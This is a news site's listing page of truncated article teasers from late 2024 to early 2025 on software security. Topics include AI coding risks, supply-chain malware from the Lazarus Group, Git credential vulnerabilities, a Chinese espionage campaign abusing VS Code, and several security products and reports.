AI coding tools: Productivity gains, security pains

Photo of a boltcutter illustrating how AI coding tools are increasing productivity but also cyber security risks in software development.

Apiiro has provided insights into how generative AI coding tools are accelerating development while simultaneously increasing security risks.

This research found that generative AI tools have supercharged coding velocity while putting sensitive data like Personally Identifiable Information (PII) and payment details at significant risk.

As organisations increasingly adopt AI-driven development workflows, the need for robust application security and governance is becoming...

26 February 2025 | Artificial Intelligence

Matan Giladi, Apiiro: Guarding your code against malicious patterns

Knight guarding code on a computer illustrating open-source resources released by Apiiro to help protect software developers and their projects against hacking through vulnerabilities in supply chains.

Malicious code is proving as persistent a threat as ever, despite years of awareness campaigns and ongoing incidents that demonstrate the vulnerabilities in software supply chains.

This year, Apiiro’s security research teams detected and analysed thousands of malicious code instances found in repositories and packages. What’s alarming is the ease with which these attacks exploit fundamental gaps in workflows, from dependency managers to build systems.

Highlighting...

20 February 2025 | Developer

Lazarus Group infiltrates supply chain with stealthy malware

Man in the shadows illustrating analysis from SecurityScorecard that finds a stealthy new malware campaign by North Korea state-sponsored hacking group Lazarus Group that targets developers through the software supply chain and can infect NPM packages and more, particularly targeting the cryptocurrency and web3 sectors.

SecurityScorecard has uncovered a stealthy malware campaign orchestrated by North Korea's notorious Lazarus Group. The operation, dubbed "Marstech Mayhem," reveals the deployment of an advanced malware implant specifically designed to target cryptocurrency wallets and infiltrate the software supply chain.

The campaign, which began emerging in late 2024, centres around a newly identified implant called "marstech1." This sophisticated tool marks a significant evolution in the...

13 February 2025 | Developer

MIT researchers develop ‘Oreo’ to protect against hardware attacks

Photo of an Oreo as MIT CSAIL researchers develop a solution named after the famous cookie to enhance the ASLR security measure found in modern operating systems, including Linux and Windows, to protect computers against hardware attacks.

Researchers at the MIT Computer Science and Artificial Intelligence Laboratory (CSAIL) have developed an innovative new method to protect computers against hardware attacks.

Within a computer's physical memory, program instructions are stored at specific addresses. Despite efforts to obscure these addresses with techniques like Address Space Layout Randomisation (ASLR), crafty hackers have found ways to exploit hardware flaws to hunt them down.

Dubbed ‘Oreo’ after...

12 February 2025 | Hacking & Security

Security engineer uncovers multiple Git vulnerabilities

Groot and GitHub mascot Octocat reading a newspaper as a security engineer uncovers multiple critical Git vulnerabilities that exposed millions of software developers to credential theft.

A security engineer has revealed a series of critical vulnerabilities in Git tools that exposed millions of developers to credential theft.

RyotaK, a security engineer at GMO Flatt Security Inc., was bug hunting for the GitHub Bug Bounty program in October 2024 when they discovered weaknesses in GitHub Desktop, Git Credential Manager, Git LFS, GitHub CLI, and GitHub Codespaces—all stemming from improper input validation and handling of text-based protocols.

Git Credential...

27 January 2025 | Developer

Snyk: AI-powered vulnerability remediations and protecting shadow IT

Security in development won’t become “invisible” this year, but it will become easier to manage.

Those are the thoughts of Danny Allan, CTO at developer-orientated cybersecurity firm Snyk.

Right now, developers are primarily tasked with creativity - building things - however, security has become part of their remit with the shift left. Allan believes we’re about to see security largely handed over to the security operations team, guided much more by AI in every...

24 January 2025 | Approaches

Software development trends and predictions for 2025

Developer using a computer with a crystal ball on the monitor illustrating predictions and trends for the software development industry in 2025.

As the world races towards 2025, Developer examines what lies ahead for software development in the new year.

Among the most pressing trends for 2025 are AI development simplification, the integration of cross-functional engineering teams, and the evolution of DevSecOps practices. These shifts promise to redefine how companies approach innovation, security, and efficiency in their development pipelines.

AI-powered development simplification

Avthar Sewrathan, AI...

19 December 2024 | Android

Operation Digital Eye: Chinese hackers exploit Visual Studio Code

A digital eye illustrating cybersecurity researchers unveiling the "Operation Digital Eye" cyberespionage operation linked to a suspected Chinese Advanced Persistent Threat (APT) group that exploits the Remote Tunnels feature of Visual Studio Code (VS Code).

A sophisticated cyberespionage operation dubbed "Operation Digital Eye" has been attributed to a suspected Chinese Advanced Persistent Threat (APT) group. 

According to Aleksandar Milenkoski, Senior Threat Researcher at SentinelLabs, and Luigi Martire, Senior Malware Analyst at Tinexta Cyber, the campaign targeted large business-to-business (B2B) IT service providers in southern Europe between late June and mid-July 2024.

Visual Studio Code hijacked

In what...

10 December 2024 | Developer

Linux Foundation releases ‘Census III’ open source report

Photo of a computer and smartphone illustrating the release of the Census III open-source report into the Free and Open Source Software (FOSS) ecosystem by the Linux Foundation, highlighting areas such as security and the rise of specific packages.

The Linux Foundation has released a report that identifies the most commonly used free and open source software (FOSS) application libraries.

Developed in partnership with the Laboratory for Innovation Science at Harvard, the “Census III” report provides invaluable insights into the state of the OSS ecosystem. Leveraging over 12 million data points from production environments across more than 10,000 companies, Census III highlights critical trends and challenges surrounding...

5 December 2024 | Developer

Cloudsmith tackles artifact complexity with observability suite

Magnifying glass over a laptop keyboard illustrating the launch of an observability suite by Cloudsmith to improve artifact management and tackle compliance and cyber security challenges with deep insights.

Cloudsmith is launching an observability suite that promises to improve artifact management by offering detailed insights into usage, security, and compliance.

In today's software development environment, dependencies are vast and intersecting—spanning open-source libraries, third-party packages, and proprietary code. With open-source components comprising over 90% of modern applications and codebases typically featuring around 500 direct and indirect dependencies, managing such...

28 November 2024 | Analytics